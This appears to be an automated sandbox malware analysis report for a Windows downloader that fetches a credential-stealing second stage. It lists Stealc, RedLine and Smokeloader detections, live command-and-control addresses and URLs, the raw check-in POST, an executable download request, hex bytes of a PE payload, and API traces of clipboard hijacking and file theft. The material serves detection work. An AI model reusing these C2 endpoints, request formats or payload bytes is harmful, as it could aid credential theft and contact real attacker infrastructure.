Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02485127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_02485127
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_0248E597

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 92.255.57.89:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://92.255.57.89/45c616e921a794b8.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 11 Dec 2024 05:57:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 11 Dec 2024 05:45:01 GMTETag: "4a400-628f819509315"Accept-Ranges: bytesContent-Length: 304128Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e4 4b a7 de a0 2a c9 8d a0 2a c9 8d a0 2a c9 8d be 78 4d 8d bc 2a c9 8d be 78 5c 8d b4 2a c9 8d be 78 4a 8d f8 2a c9 8d 87 ec b2 8d ab 2a c9 8d a0 2a c8 8d ca 2a c9 8d be 78 43 8d a1 2a c9 8d be 78 5d 8d a1 2a c9 8d be 78 58 8d a1 2a c9 8d 52 69 63 68 a0 2a c9 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b7 fe df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 7e 9d 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 27 03 00 64 00 00 00 00 00 41 00 30 1d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c f3 02 00 00 10 00 00 00 f4 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 20 00 00 00 10 03 00 00 22 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 b0 3d 00 00 40 03 00 00 6c 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1d 01 00 00 00 41 00 00 1e 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 92.255.57.89Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 43 44 42 32 37 43 41 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="hwid"B61CDB27CA5C3615030116------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="build"default------AKKKECBKKECGCAAAEHJK--

Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 92.255.57.89 92.255.57.89

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: post-to-me.com

Source: unknown

HTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 92.255.57.89Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 43 44 42 32 37 43 41 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="hwid"B61CDB27CA5C3615030116------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="build"default------AKKKECBKKECGCAAAEHJK--

Source: SEejSLAS9f.exe, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeX
Source: SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeo
Source: SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exev
Source: 1D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php2dPf
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.php;
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpo
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll
Source: 1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll~
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89/s
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.890
Source: 1D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89l(
Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.89lq
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: SEejSLAS9f.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEI

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02471942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02471942

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Code function: 1_2_00409876 CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

1_2_00409876

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02472361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02472361
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02472605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02472605

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02498289	0_2_02498289
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0249ED47	0_2_0249ED47
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02484172	0_2_02484172
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024976EB	0_2_024976EB
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0249D755	0_2_0249D755
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024987C7	0_2_024987C7
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02497A5D	0_2_02497A5D
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0247EBDB	0_2_0247EBDB
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02486916	0_2_02486916
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0248398C	0_2_0248398C
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_024A6F26	0_2_024A6F26
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02497FCE	0_2_02497FCE
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_0249ED47	0_2_0249ED47
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02497D07	0_2_02497D07
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: 0_2_02488D16	0_2_02488D16
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02494B37	1_2_02494B37

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: String function: 02480019 appears 119 times
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: String function: 00410720 appears 52 times
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: String function: 02480987 appears 52 times
Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Code function: String function: 0040FDB2 appears 123 times
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: String function: 00404980 appears 317 times

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296

Source: SEejSLAS9f.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 1D71.tmp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: SEejSLAS9f.exe	Binary or memory string: OriginalFileName vs SEejSLAS9f.exe
Source: SEejSLAS9f.exe, 00000000.00000003.1669820867.00000000024E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs SEejSLAS9f.exe
Source: SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs SEejSLAS9f.exe
Source: SEejSLAS9f.exe, 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs SEejSLAS9f.exe

Source: SEejSLAS9f.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: SEejSLAS9f.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1D71.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@1/3

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

Code function: 0_2_008DE5C6 CreateToolhelp32Snapshot,Module32First,

0_2_008DE5C6

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Code function: 1_2_0248CE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

1_2_0248CE47

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

